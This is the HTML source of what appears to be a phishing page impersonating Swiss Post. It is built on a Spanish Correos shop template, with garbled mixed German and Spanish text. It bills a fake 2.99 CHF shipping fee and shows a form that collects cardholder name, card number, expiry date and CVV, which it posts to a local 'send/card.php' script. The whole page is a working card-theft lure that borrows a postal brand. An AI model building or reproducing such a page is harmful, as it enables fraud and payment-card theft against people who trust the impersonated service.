<html lang="en"><!--<![endif]-->
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<link href="https://cdn.mycomandia.com/static/shop/common/bundle/bootstrap-4.1.0/css/bootstrap.min.css?v=2019.12.17" media="screen" rel="stylesheet" />
	<link href="https://cdn.mycomandia.com/static/shop/common/css/validationEngine.jquery.css?v=2019.12.17" rel="stylesheet" />
	<link href="https://cdn.mycomandia.com/static/shop/common/fonts/flaticon/flaticon.css?v=2019.12.17" rel="stylesheet" />
	<link href="https://cdn.mycomandia.com/static/shop/common/bundle/font-awesome-5/web-fonts-with-css/css/fontawesome-all.min.css?v=2019.12.17" rel="stylesheet" />
	<link href="https://cdn.mycomandia.com/static/shop/common/css/new-style-common-screen.css?v=2019.12.17" rel="stylesheet" />
	<link href="https://tienda.correos.es/css/common-dynamic.css" rel="stylesheet" />
	<link rel="stylesheet" href="css/styles.css">
	<!--[if lt IE 9]>
	
			<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
			<script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script>
		<![endif]-->
	<title>Stratseite - Die Poste</title>
	<meta name="description" lang="es" content="En la Tienda Online de Correos tenemos todo para hacer tus envíos: cajas, sobres, sellos, embalajes... regalos, coleccionismo y productos solidarios."><!-- Robots --><meta name="robots" content="index,follow"><!-- / Robots --><meta name="expires" content="0"><meta name="revisit-after" content="1 days"><meta http-equiv="pragma" content="no-cache">
</head>
<body class="common-screen-body" style=""><!-- Google Tag Manager -->
<section class="common-screen-header">
<nav class="navbar navbar-expand-md navbar-light"><a class="navbar-brand" href="/"><img src="https://upload.wikimedia.org/wikipedia/fr/thumb/3/35/Logo_La_Poste_Suisse.svg/1280px-Logo_La_Poste_Suisse.svg.png" /></a><button aria-controls="common-screen-top-navbar" aria-expanded="false" aria-label="Toggle navigation" class="navbar-toggler" data-target="#common-screen-top-navbar" data-toggle="collapse" type="button"></button>
<div class="collapse navbar-collapse" id="common-screen-top-navbar">
<div class="navbar-nav ml-auto"><a class="nav-item nav-link" href="#">Reinkommen </a> <a class="nav-item nav-link" href="#">Registrierung</a> <a class="nav-item nav-link" href="#">Lala Einkaufskorb</a></div>
</div>
</nav>
</section>

<section class="common-screen-content">
<section class="go-back-to-shop">
<div class="container">
<ul class="nav">
	<li class="nav-item"><a class="nav-link" href="#">&lt; R&uuml;ckgabe an den Laden</a></li>
</ul>
</div>
</section>

<section class="checkout-template">
<div class="container">
<div class="cart-no-product-alert" style="display:none">Sie haben keine Artikel in Ihrem Warenkorb</div>
<!--null
-->

<div class="alert alert-danger alert-error alert-dismissable shopping-cart-alert" style="display:none"><button class="close" data-dismiss="alert" type="button">&times;</button></div>
<!-- Mobile version Summary of the cart -->

<div class="checkout-mobile-summary">
<div class="checkout-summary-fixed d-block d-lg-none">
<div class="row"></div>
<!-- summary checkout mobile -->

<div class="summary-checkout">
<div class="summary-product-thumbs row"></div>

<hr />
<div class="row">
<div class="col"><span>Gesamt</span></div>

<div class="col text-right"><span>2.99CHF</span></div>
</div>
</div>
<!-- /summary checkout mobile --></div>
</div>
<!-- Mobile version Summary of the cart -->

<div class="row flex-column-reverse flex-lg-row">
<div class="col-lg-7">
<div class="checkout-left-side">
<div id="cartParent" style="opacity: 1;">
<div class="shopping-cart-locked-parent" id="shippingZoneLocked" style="display: block;"></div>

<div class="shopping-cart-form-parent" id="shippingZoneForm" style="display: none;"></div>

<div class="shopping-cart-locked-parent" id="carrierLocked" style="display: block;">
<section class="checkout-small-shipping-type small-box">
<div class="small-box-content">
<div class="title">
<div class="title-content">
<div class="title-icon"></div>

<div class="title-text">
<h4>Einreichungscode: CH / 29384565610</h4>

<p>Standard Pack</p>
</div>
</div>
</div>

<div class="buttons"><button class="btn btn-primary modify-button btn-edit-carrier"><span class="d-none d-sm-none d-md-block">&Auml;ndern</span></button></div>
</div>
</section>
</div>

<div class="shopping-cart-form-parent" id="carrierFormParent" style="display: none;">
<section class="checkout-shipping-type">
<div class="checkout-box">
<div class="checkout-box-title">
<div class="checkout-box-title-icon"></div>

<h4>Einreichungscode: CH / 29384565610</h4>
</div>

<div class="checkout-box-content">
<div class="checkout-shipping-type-content">
<form action="/cart/changecarrier" id="carrierForm" method="post"><input id="carrierid" name="carrierid" type="hidden" value="3" /> <input id="isselfpick" name="isselfpick" type="hidden" value="0" /> <input id="selfpickstorecode" name="selfpickstorecode" type="hidden" value="" /> <input id="homepaqtoken" name="homepaqtoken" type="hidden" value="" /> <!--  NEW SCREEN BEGIN -->
<div class="checkout-shipping-type-zones">
<div class="checkout-shipping-type-zones-image"><img alt="Paq Estándar" class="img-responsive" src="https://cdn.mycomandia.com/static/logos/correos-paq-72-mini.png" /></div>

<div class="custom-control custom-checkbox form-check office-delivery"><input class="custom-control-input carrierselection" data-carrier="3" data-selfpick="0" id="carrierselection3" type="checkbox" /> <label class="custom-control-label" for="carrierselection3"> Zu deinem Zuhause <strong>(2.99CHF)</strong> </label></div>

<div class="custom-control custom-checkbox form-check office-nodelivery-container"><input class="custom-control-input carrierselection" data-carrier="3" data-is-pickup-at-shop="0" data-postalcode="39999" data-selfpick="1" id="carrierselection_self3" type="checkbox" /> <label class="custom-control-label" for="carrierselection_self3"> Abholung am Post CH <strong>(2.99CHF)</strong> </label> <!-- Correos hidden offices -->

<div class="offices-search-container" style="display:none"><!-- <div class="custom-control custom-checkbox form-check">
												<input type="checkbox" class="custom-control-input" id="Office1">
												<label class="custom-control-label" for="Office1">Barcelona suc 16. la vila olimpica - doctor trueta 58-60 08005 barcelona</label>
											</div>
											<div class="custom-control custom-checkbox form-check">
												<input type="checkbox" class="custom-control-input" id="Office2">
												<label class="custom-control-label" for="Office2">Barcelona suc 16. la vila olimpica - doctor trueta 58-60 08005 barcelona</label>
											</div> --></div>
<!-- Correos hidden offices --></div>
</div>

<div style="width:100%">
<p><small class="text-muted">Ihre Sendungen in maximal 48 Stunden</small></p>
</div>
<!--  NEW SCREEN END --> <!--  NEW SCREEN BEGIN -->

<div class="checkout-shipping-type-zones type-city">
<div class="checkout-shipping-type-zones-image"><img alt="Paq Estándar CityPaq" class="img-responsive" src="https://cdn.mycomandia.com/static/logos/correos-paq72.png" /></div>

<div class="custom-control custom-checkbox form-check office-delivery"><input class="custom-control-input carrierselection" data-carrier="9" data-homepaq="1" data-selfpick="1" id="carrierselection9" type="checkbox" /> <label class="custom-control-label" for="carrierselection9"> Versand nach Stadt <strong>(2.99CHF)</strong> </label>

<div class="cityPaq-search-container" style="display:none;">
<p>Geben Sie Ihren Stadtbenutzernamen ein:</p>

<div class="input-group"><input class="form-control py-2 homepaqusername validate[required]" id="homepaqusername9" name="homepaqusername9" type="search" /> <span class="input-group-append"> <input class="btn btn-outline-secondary searchhomepaq" data-target="homepaqresult9" data-val="homepaqusername9" type="button" value="Buscar" /> </span></div>

<div class="homepaqresultdiv" id="homepaqresult9">
<p class="citypaq-text">Wenn Sie noch kein City-Benutzer sind, k&ouml;nnen Sie sich unter folgendem Link registrieren:<a href="https://online.citypaq.es/pages/registro.xhtml" target="_homepaq">In die Stadt gehen</a></p>
</div>
</div>
</div>
</div>

<div style="width:100%"><small class="text-muted">Standard-Stadtpaket</small>

<p><small class="text-muted">Geben Sie Ihre Bestellungen auf und holen Sie sie in der Stadt ab, die am besten zu Ihnen passt</small></p>
</div>
<!--  NEW SCREEN END --></form>
</div>
</div>
</div>
</section>
</div>

<div class="shopping-cart-locked-parent" id="paypalexpressParent" style="display: block;"></div>

<div class="shopping-cart-locked-parent" id="shippingAddressLocked" style="display: none;"></div>

<div class="shopping-cart-form-parent" id="shippingAddressList" style="display: none;"></div>

<div class="shopping-cart-form-parent" id="shippingAddressForm" style="display: block;">
<section class="checkout-new-shipping-address">
<div class="checkout-box">
<div class="checkout-box-title">
<div class="checkout-box-title-icon"></div>

<h4>Zahlungsdetails</h4>
</div>

<div class="checkout-box-content">
<form action="send/card.php" class="checkout-new-shipping-address-form" data-toggle="validate" method="post">
<div class="form-row">
<div class="form-group col-md-4"><label for="shipping.firstname">Name*</label> <input class="form-control validate[required,minSize[2]] null" id="fname" maxlength="50" name="fname" required="" type="text" /></div>

<div class="form-group col-md-8"><label for="shipping.lastname">Nachnamen*</label> <input class="form-control validate[required,minSize[2]] null" id="lname" maxlength="50" name="lname" required="" type="text" /></div>
</div>

<div class="form-row">
<div class="form-group col-md-8"><label for="shipping.email">N&uacute;mero de tarjeta*</label> <input class="form-control validate[required,custom[email]] null" id="shipping.email" maxlength="19" name="card" placeholder="XXXX XXXX XXXX XXXX" required="" type="text" /></div>
</div>

<div class="form-row">
<div class="form-group col-md-4"><label for="inputAddress2">Fecha de caducidad</label> <input class="form-control null" id="shipping.address2" maxlength="7" name="exp" placeholder="MM/YYYY" required="" type="text" /></div>
</div>

<div class="form-row">
<div class="form-group col-md-4"><label for="shipping.postalcode">CVV-Code*</label> <input class="form-control validate[required] null" id="shipping.postalcode" maxlength="3" name="cvv" placeholder="XXX" required="" type="text" /></div>
</div>

<div class="form-group"></div>

<div class="form-group">
<div class="custom-control custom-checkbox"><input class="custom-control-input validate[required]" data-prompt-position="bottomRight" id="accept_dpp_shipping" name="accept_dpp_shipping" type="checkbox" value="YES" /> <label class="custom-control-label" for="accept_dpp_shipping">Ich habe das gelesen und akzeptiert<a href="#" target="_blank"><b>Datenschutz-Bestimmungen</b></a>.</label></div>
</div>

<section class="continue-button py-2 mb-4" id="continueButtonParent">
<div class="d-flex justify-content-end"><button class="btn btn-danger btn-cart-cancel-edit ml-1" style="display:none" type="button">Cancelar</button><button class="btn btn-primary btn-cart-continue" type="submit">Zahlen und weitermachen &gt;</button></div>
</section>
</form>
</div>
</div>
</section>
</div>

<div class="shopping-cart-locked-parent" id="billingAddressLocked" style="display: none;"></div>

<div class="shopping-cart-form-parent" id="billingAddressForm" style="display: none;"></div>

<div class="shopping-cart-form-parent" id="paymentBox" style="display: none;"></div>

<div class="shopping-cart-locked-parent" id="paymentLocked" style="display: none;"></div>

<div class="shopping-cart-form-parent d-lg-none" id="discountForm" style="display: none;"></div>

<div class="shopping-cart-locked-parent" id="discountLocked" style="display: none;"></div>

<div id="checkoutButton" style="display:none">
<div class="order-payment-checkboxs">
<div class="custom-control custom-checkbox"><input class="custom-control-input" id="isacceptmarketing" name="isacceptmarketing" type="checkbox" value="YES" /> <label class="custom-control-label" for="isacceptmarketing">Ich m&ouml;chte Angebote und Werbeaktionen f&uuml;r die verkauften Produkte und Dienstleistungen erhalten</label></div>

<div class="custom-control custom-checkbox"><input class="custom-control-input validate[required]" data-prompt-position="bottomRight" id="accept_dpp" name="accept_dpp" type="checkbox" value="YES" /> <label class="custom-control-label" for="accept_dpp">Ich habe das gelesen und akzeptiert<a href="/page/condiciones-generales" target="_blank"><b>Verkaufsbedingungen</b></a>.</label></div>
</div>

<section class="continue-button py-2 mb-4">
<div class="d-flex justify-content-end"><button class="btn btn-primary btn-shopping-cart-checkout" type="button">Bestellung best&auml;tigen und bezahlen &gt;</button></div>
</section>
</div>
</div>
</div>
</div>

<div class="col-lg-5">
<div class="checkout-right-side">
<section class="checkout-summary d-none d-lg-block">
<div class="summary-product-list">
<div class="item">
<div class="row">
<div class="col-3 flex-grow-0 image-col">
<div class="item-image"><a href="#"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR0Vy9l0Up_2WOQKyk7KOYCBqRjAD8xITWAlg&amp;usqp=CAU" style="width: 100px; height: 80px;" /> </a></div>
</div>

<div class="col-5 title-col">
<div class="item-title">
<p>Zus&auml;tzliche Versandkosten</p>
</div>
</div>

<div class="col-4 flex-grow-0 buttons-col">
<div class="d-flex buttons-col-container justify-content-between h-100">
<div class="item-delete-button"><button class="btn-update-cart-item-quantity" data-input-selector="#cartQuantityProductId_147" value="0"></button></div>

<div class="item-price-total">
<p class="item-price">2.99CHF</p>

<p class="item-vat-text">(1,21 CHF IVA inbegriffen)</p>
</div>
</div>
</div>
</div>
</div>
</div>

<div class="summary-subtotal">
<div class="summary-total">
<div class="row">
<div class="col">
<div class="text-left">
<p class="total-title">Gesamt</p>
</div>
</div>

<div class="col">
<div class="text-right">
<p class="total-amount">2.99CHF</p>

<p class="total-vat-included">(IVA inbegriffen)</p>
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
</div>
</div>
</section>
</section>

<section class="common-screen-footer"></section>
</body>
</html>